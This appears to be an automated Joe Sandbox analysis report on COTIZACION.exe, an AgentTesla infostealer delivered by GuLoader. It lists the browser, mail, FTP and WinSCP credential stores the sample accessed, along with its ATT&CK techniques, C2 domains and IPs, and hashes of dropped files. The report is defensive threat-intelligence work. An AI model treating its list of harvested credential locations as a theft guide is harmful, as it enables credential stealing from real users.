Source: C:\Users\user\Desktop\COTIZACION.exe

0_2_004036DA

Source: C:\Users\user\Desktop\COTIZACION.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 00000005.00000002.2598720371.000000003832C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2598720371.0000000038334000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2598720371.0000000038301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: COTIZACION.exe PID: 7796, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\COTIZACION.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\COTIZACION.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\COTIZACION.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\COTIZACION.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 00000005.00000002.2598720371.0000000038301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: COTIZACION.exe PID: 7796, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 00000005.00000002.2598720371.000000003832C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2598720371.0000000038334000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2598720371.0000000038301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: COTIZACION.exe PID: 7796, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	3 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Native API	Boot or Logon Initialization Scripts	1 Access Token Manipulation	1 Obfuscated Files or Information	11 Input Capture	225 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	11 Process Injection	1 DLL Side-Loading	1 Credentials in Registry	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Masquerading	NTDS	311 Security Software Discovery	Distributed Component Object Model	11 Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	141 Virtualization/Sandbox Evasion	LSA Secrets	141 Virtualization/Sandbox Evasion	SSH	1 Clipboard Data	23 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Access Token Manipulation	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Process Injection	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
COTIZACION.exe	63%	ReversingLabs	Win32.Trojan.GuLoader

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nszA7D1.tmp\System.dll	0%	ReversingLabs

Source	Detection	Scanner	Label	Link
http://showpiece.trillennium.biz	0%	Avira URL Cloud	safe
http://mail.showpiece.trillennium.biz	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	high
drive.google.com	142.250.185.238	true	false	high
drive.usercontent.google.com	142.250.185.161	true	false	high
api.ipify.org	104.26.12.205	true	false	high
showpiece.trillennium.biz	67.23.226.139	true	true	unknown
mail.showpiece.trillennium.biz	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://showpiece.trillennium.biz	COTIZACION.exe, 00000005.00000002.2598720371.000000003832C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://drive.usercontent.google.com/H	COTIZACION.exe, 00000005.00000002.2578600930.0000000007CB7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com	COTIZACION.exe, 00000005.00000003.2129050802.0000000007CC0000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000003.2128991351.0000000007CC0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.ipify.org	COTIZACION.exe, 00000005.00000002.2598720371.00000000382B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://r11.o.lencr.org0#	COTIZACION.exe, 00000005.00000002.2578600930.0000000007C48000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2599338437.000000003A3CA000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2598720371.0000000038334000.00000004.00000800.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2578600930.0000000007C84000.00000004.00000020.00020000.00000000.sdmp	false		high
http://mail.showpiece.trillennium.biz	COTIZACION.exe, 00000005.00000002.2598720371.000000003832C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://drive.google.com/	COTIZACION.exe, 00000005.00000002.2578600930.0000000007C48000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/v	COTIZACION.exe, 00000005.00000002.2578600930.0000000007C48000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	COTIZACION.exe, 00000005.00000002.2578600930.0000000007C48000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2599338437.000000003A3CA000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2598720371.0000000038334000.00000004.00000800.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2578600930.0000000007C84000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	COTIZACION.exe, 00000005.00000002.2578600930.0000000007C48000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2599338437.000000003A3CA000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2598720371.0000000038334000.00000004.00000800.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2578600930.0000000007C84000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/	COTIZACION.exe, 00000005.00000002.2578600930.0000000007CB7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://apis.google.com	COTIZACION.exe, 00000005.00000003.2129050802.0000000007CC0000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000003.2128991351.0000000007CC0000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_Error...	COTIZACION.exe, 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmp, COTIZACION.exe, 00000000.00000000.1325260192.0000000000408000.00000002.00000001.01000000.00000003.sdmp, COTIZACION.exe, 00000005.00000002.2572340279.0000000000408000.00000002.00000001.01000000.00000003.sdmp, COTIZACION.exe, 00000005.00000000.1996163336.0000000000408000.00000002.00000001.01000000.00000003.sdmp	false		high
https://api.ipify.org/t	COTIZACION.exe, 00000005.00000002.2598720371.00000000382B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	COTIZACION.exe, 00000005.00000002.2598720371.00000000382B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://r11.i.lencr.org/0	COTIZACION.exe, 00000005.00000002.2578600930.0000000007C48000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2599338437.000000003A3CA000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2598720371.0000000038334000.00000004.00000800.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2578600930.0000000007C84000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
67.23.226.139	showpiece.trillennium.biz	United States	33182	DIMENOCUS	true
104.26.12.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
142.250.185.161	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
142.250.185.238	drive.google.com	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1549213
Start date and time:	2024-11-05 12:36:20 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	COTIZACION.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/12@4/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 84% Number of executed functions: 140 Number of non-executed functions: 17
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: COTIZACION.exe

Simulations

Behavior and APIs

Time	Type	Description
06:38:38	API Interceptor	323x Sleep call for process: COTIZACION.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
67.23.226.139	Quotation.exe	Get hash	malicious	AgentTesla	Browse
	Quotation.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	Quotation.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	Revised PI 28 08 2024.exe	Get hash	malicious	AgentTesla	Browse
	PI 22_8_2024.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	COTIZACION 19 08 24.exe	Get hash	malicious	AgentTesla	Browse
	pago.exe	Get hash	malicious	AgentTesla	Browse
	invoice.exe	Get hash	malicious	AgentTesla	Browse
	SijLVTsunN.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	DHL BILL OF LANDING SHIPPING INVOICE DOCUMENTS.exe	Get hash	malicious	AgentTesla	Browse
104.26.12.205	Yc9hcFC1ux.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	6706e721f2c06.exe	Get hash	malicious	Remcos	Browse	api.ipify.org/
	perfcc.elf	Get hash	malicious	Xmrig	Browse	api.ipify.org/
	SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	hloRQZmlfg.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	file.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0017.t-0009.t-msedge.net	https://outlook.office.com@www.nescini.com/wp-content/uploads/2024/10/JTe86LlZl2-nfET-jEQ0WO-6.htm	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	https://QBE.fmgconnect.co.uk/login?crn=QBE04487166	Get hash	malicious	Unknown	Browse	13.107.246.45
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	13.107.246.45
	https://www.canva.com/design/DAGVlowNqco/LaGv3kp6ecOkwIXDSEYQLQ/view?utm_content=DAGVlowNqco&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	Unknown	Browse	13.107.246.45
	2877872483264021301.js	Get hash	malicious	Strela Downloader	Browse	13.107.246.45
	10289118772168318999.js	Get hash	malicious	Strela Downloader	Browse	13.107.246.45
	AWB.exe	Get hash	malicious	FormBook	Browse	13.107.246.45
	De_posit Confirmati0n_ Mitie.html	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=ZFCKQSES42J831UCOWMB4MEAK36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XSwDnNeW8yycT&sa=t&esrc=nNeW8FA0xys8Em2FL&source=&cd=tS6T8Tiw9XH&cad=XpPkDfJXVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=am%70%2F%77%77%77%2E%64%65%72%79%61%6E%63%6F%6E%73%75%6C%74%69%6E%67%2E%63%6F%6D%2F%74%31%62%72%6F%77%6E%34%35%2F1112449584/aGVsZW5AY3VyZXBhcmtpbnNvbnMub3JnLnVr	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	13.107.246.45
	https://astonishing-maize-sunstone.glitch.me/	Get hash	malicious	Unknown	Browse	13.107.246.45
api.ipify.org	REVISED PO NO.8389.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	https://www.canva.com/design/DAGVlowNqco/LaGv3kp6ecOkwIXDSEYQLQ/view?utm_content=DAGVlowNqco&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	Unknown	Browse	104.26.12.205
	Shipping documents.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.74.152
	DB_DHL_AWB_001833022AD.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	Payslip_October_2024.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	CFuejz2dRu.exe	Get hash	malicious	Discord Token Stealer	Browse	104.26.13.205
	CFuejz2dRu.exe	Get hash	malicious	Discord Token Stealer	Browse	104.26.13.205
	2b7cu0KwZl.exe	Get hash	malicious	Unknown	Browse	172.67.74.152
	2b7cu0KwZl.exe	Get hash	malicious	Unknown	Browse	104.26.13.205
	Zc9eO57fgF.elf	Get hash	malicious	Unknown	Browse	172.67.74.152

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	3Ri17T8XLh.exe	Get hash	malicious	XWorm	Browse	172.67.19.24
	TEKJ09876545678002.cmd.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	SECRFQ2024-0627 - ON HAND PROJECT - NEOM PROJECTS - SAUDI ELAF Co..exe	Get hash	malicious	FormBook	Browse	188.114.97.3
	REVISED PO NO.8389.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	https://www.supercontable.es/emailing/track_superc.php?Destino=!:%7D%7D%7C.pepeworld.pro/c2VyZ2lvLmFsdmFyZXpAdG90YWxlbmVyZ2llcy5jb20=&IdTracking=03397&user=964998racking=10419&user=081904	Get hash	malicious	Phisher	Browse	104.17.25.14
	m68k.elf	Get hash	malicious	Mirai, Gafgyt	Browse	1.13.123.50
	https://outlook.office.com@www.nescini.com/wp-content/uploads/2024/10/JTe86LlZl2-nfET-jEQ0WO-6.htm	Get hash	malicious	HTMLPhisher	Browse	172.67.198.39
	https://QBE.fmgconnect.co.uk/login?crn=QBE04487166	Get hash	malicious	Unknown	Browse	162.247.243.39
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.133.135
	https://www.canva.com/design/DAGVlowNqco/LaGv3kp6ecOkwIXDSEYQLQ/view?utm_content=DAGVlowNqco&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	Unknown	Browse	188.114.96.3
DIMENOCUS	Quotation.exe	Get hash	malicious	AgentTesla	Browse	67.23.226.139
	Quotation.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	67.23.226.139
	Quotation.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	67.23.226.139
	https://lumen.backerkit.com/invites/mAqpu6B5ZtIAsrg4a5WdGA/confirm?redirect_path=//rahul-garg-lcatterton-com.athuselevadores.com.br	Get hash	malicious	HTMLPhisher	Browse	107.161.183.172
	http://prabal-gupta-lcatterton-com.athuselevadores.com.br/	Get hash	malicious	HTMLPhisher	Browse	107.161.183.172
	nklarm7.elf	Get hash	malicious	Unknown	Browse	109.73.163.173
	rtransferencia-.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	138.128.178.242
	bin.i586.elf	Get hash	malicious	Gafgyt, Mirai	Browse	98.142.105.97
	https://docsend.com/view/63jvhxyyj7pwxerg	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	64.37.50.172
	RemotePCViewer.exe	Get hash	malicious	Unknown	Browse	199.168.186.114

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	3Ri17T8XLh.exe	Get hash	malicious	XWorm	Browse	104.26.12.205
	TEKJ09876545678002.cmd.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.26.12.205
	REVISED PO NO.8389.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	Detalles de la factura_________________________pdf.exe	Get hash	malicious	Snake Keylogger	Browse	104.26.12.205
	EL GINER.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.26.12.205
	PO_63738373663838____________________________________________________________________________.exe	Get hash	malicious	Snake Keylogger	Browse	104.26.12.205
	RFQ#SSM-354459.exe	Get hash	malicious	MassLogger RAT	Browse	104.26.12.205
	Shipping documents.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.12.205
	SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	https://de.vour.io	Get hash	malicious	Unknown	Browse	104.26.12.205
37f463bf4616ecd445d4a1937da06e19	HATCH COVER REQ_AW24 New Order Request.exe	Get hash	malicious	GuLoader	Browse	142.250.185.238 142.250.185.161
	EL GINER.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	142.250.185.238 142.250.185.161
	rFactura02Presupuesto_9209Urbia_pdf_.exe	Get hash	malicious	FormBook, GuLoader	Browse	142.250.185.238 142.250.185.161
	MSI18A.dll	Get hash	malicious	Unknown	Browse	142.250.185.238 142.250.185.161
	z120X20SO__UK__EKMELAMA.exe	Get hash	malicious	GuLoader, Remcos	Browse	142.250.185.238 142.250.185.161
	Request for quotation for the pumps.vbs	Get hash	malicious	FormBook, GuLoader	Browse	142.250.185.238 142.250.185.161
	PerceivedFurthermore.exe	Get hash	malicious	LummaC Stealer	Browse	142.250.185.238 142.250.185.161
	build.exe	Get hash	malicious	Stealc, Vidar	Browse	142.250.185.238 142.250.185.161
	Dekont#400577_89008_96634.exe	Get hash	malicious	Azorult, GuLoader	Browse	142.250.185.238 142.250.185.161
	att1-241104022450_PDF.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	142.250.185.238 142.250.185.161

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nszA7D1.tmp\System.dll	Quotation.exe	Get hash	malicious	AgentTesla	Browse
	1364. 2024.exe	Get hash	malicious	AgentTesla	Browse
	Quotation.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	Quote_220072.exe	Get hash	malicious	AgentTesla	Browse
	Quotation.exe	Get hash	malicious	FormBook, GuLoader	Browse
	Quotation.exe	Get hash	malicious	FormBook, GuLoader	Browse
	PO-000172483.exe	Get hash	malicious	FormBook, GuLoader	Browse
	PO-000172483.exe	Get hash	malicious	FormBook, GuLoader	Browse
	PO-000172483 (2).exe	Get hash	malicious	FormBook, GuLoader	Browse
	Quotation.exe	Get hash	malicious	FormBook, GuLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nszA7D1.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\COTIZACION.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	5.97694153396788
Encrypted:	false
SSDEEP:	192:acA1YOTDExj7EFrYCT4E8y3hoSdtTgwF43E7QbGPXI9uIc6w79Mw:RR7SrtTv53tdtTgwF4SQbGPX36wJMw
MD5:	D6F54D2CEFDF58836805796F55BFC846
SHA1:	B980ADDC1A755B968DD5799179D3B4F1C2DE9D2D
SHA-256:	F917AEF484D1FBB4D723B2E2D3045CB6F5F664E61FBB3D5C577BD1C215DE55D9
SHA-512:	CE67DA936A93D46EF7E81ABC8276787C82FD844C03630BA18AFC3528C7E420C3228BFE82AEDA083BB719F2D1314AFAE913362ABD1E220CB364606519690D45DB
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Quotation.exe, Detection: malicious, Browse Filename: 1364. 2024.exe, Detection: malicious, Browse Filename: Quotation.exe, Detection: malicious, Browse Filename: Quote_220072.exe, Detection: malicious, Browse Filename: Quotation.exe, Detection: malicious, Browse Filename: Quotation.exe, Detection: malicious, Browse Filename: PO-000172483.exe, Detection: malicious, Browse Filename: PO-000172483.exe, Detection: malicious, Browse Filename: PO-000172483 (2).exe, Detection: malicious, Browse Filename: Quotation.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@t.]!..]!..]!...T..Z!...Y..Z!..]!..I!...T..Y!...T..\!...T..\!...T..\!..Rich]!..................PE..L.....*c.........."!.....$..........J........@...............................p............@..........................@.......A..P............................`.......................................................@..X............................text...{".......$.................. ..`.rdata.......@.......(..............@..@.data...D....P.......,..............@....reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Music\antithetic.ini

Download File

Process:	C:\Users\user\Desktop\COTIZACION.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	35
Entropy (8bit):	4.264578373902383
Encrypted:	false
SSDEEP:	3:apWPWPjNLCNHiy:UPRCNHiy
MD5:	58AC0B5E1D49D0EE1AED2FE13FAE6C7A
SHA1:	02C8384573D47CA39F2E2ACA32B275861EC59A93
SHA-256:	624F49944CB84ED51FECABCD549AE3B47152F9A20C4A95E93C8B007AEFE9FEAB
SHA-512:	8F5F062D6EBB8312DA4AD4F5AF077B1EAA2E14244823F15E6A87A9E48C7172CC1EA5AB691D3B4F9D8F8E0605F9CB3AA06590B4389820DA531633D9915B988FFC
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	[broadspread]..slyngvrk=houghband..

C:\Users\user\overlays\besvangredes\Afbetaltes\regill.ful

Download File

Process:	C:\Users\user\Desktop\COTIZACION.exe
File Type:	data
Category:	dropped
Size (bytes):	489048
Entropy (8bit):	1.245615736901525
Encrypted:	false
SSDEEP:	1536:HMtjgMjMD1whyMu1IXCVAcFNpruXO+nBJH:stjgmYi03XDL+nBJ
MD5:	B4FB425BAF217F31E91AAB39ABF66DCD
SHA1:	03DE3BD0F923AB14213B6C4461C5CA73A0A6371C
SHA-256:	4BC57A47B82B63EC20B393F65F3585EB81FE3F7748229CD19DEC8FE8A41D67C3
SHA-512:	E72395FD6098130EFD543C5941781A1AA80FCE17C7701CB40FA8874271E0D43E0F7F082EBF5D458181287DE41CF4B34F88DCAABE84D8AD51003EF5DA1495D871
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.............9.....................A..............Z...........=.........................................................h...'.........................................................L..............................................p..C...........................,...................................p..........S............................................................................{............................................(.........C...^.......................................U.........~................................................z.....................................A................................................]..........i.............,....................................g..............................3......K.....................u..............................................................H.t....................................................................................................................`.............................)1.............q..............4....

C:\Users\user\overlays\besvangredes\Afbetaltes\sortlistningens.txt

Download File

Process:	C:\Users\user\Desktop\COTIZACION.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	371
Entropy (8bit):	4.247837387326688
Encrypted:	false
SSDEEP:	6:r8pLNAsEyv1WABlvMW9uu+IXvVJyQXPhXOQemtNxgFUvNwmA6AQOp2jMPA9cnb:ruJAOgABlQuTXbyKhXOLmtLgHmFOYjMV
MD5:	46003C65AA12A0EBE55662F0141186DC
SHA1:	739652C3375018DAFFB986302A7D3E8D32770B41
SHA-256:	2EA079DEDE1B356842C5F5E0751B5E2B6565FDED65DAFB59A73D170C002ABB27
SHA-512:	59D394789F9EECE97873D56AEA64F353D3E13E007E4ACBD396AC76CB68E91494EB65888049EF05CBE9B20597ADADCC960D067F90AAD3EA5AA46AC3A82F5B82FD
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	degageredes indtgters commencing subfunctional rubiator startkatalogernes dismasted outsport..surkaalen syndedes turtledoving,leddelsestes obs jernholdigt normsammenbruds.azotite hestesko hvilkes snrkels enstatitite nappes,slangudtrykkets squills consonantising windchest interpretableness lynkrigen..vinders drikkegildet orgal snakkehjrnets responders etageejendommens..

C:\Users\user\overlays\besvangredes\Emmens.udk

Download File

Process:	C:\Users\user\Desktop\COTIZACION.exe
File Type:	data
Category:	dropped
Size (bytes):	482519
Entropy (8bit):	1.2446382063037653
Encrypted:	false
SSDEEP:	1536:+yiLw81PnsncGiIsTVODPOqNbsVEVWZkZA4:G/Pne9iIyVODPsVpZkZA4
MD5:	1D099F6122F4B7C8A78925726B59E5C3
SHA1:	EEA154E31FF04CD1A2CED0193F7633ED219CFA47
SHA-256:	1B6DC1EAD079DB05B998725B154E803E6E1504E7E5B49C5611D55E018CD45E6D
SHA-512:	F31F0A285C5A6EB2236CCD49A8BF939E46624F270E0270FC4C5640B37684BC1C7780C5350F778DA8E9D0B8CD25320C1909A9CD937F15BB3A7CDDBCEEE94C47FB
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.....................................FP.l...........-...............#............W.............a...............3..........1..i.k.............;......H.............................2..............X..H.....}..................................................M.........M........................................................8......_............8....................................................................?...................................................................................J..............................................T.....................................................B..........................7.....................4........o..P................!........................................................................q..........................................................................l............................;...................................q...............................g.......mm......................................n.......................P.........

C:\Users\user\overlays\besvangredes\Loftrums.Aku

Download File

Process:	C:\Users\user\Desktop\COTIZACION.exe
File Type:	data
Category:	dropped
Size (bytes):	384678
Entropy (8bit):	7.648852242049378
Encrypted:	false
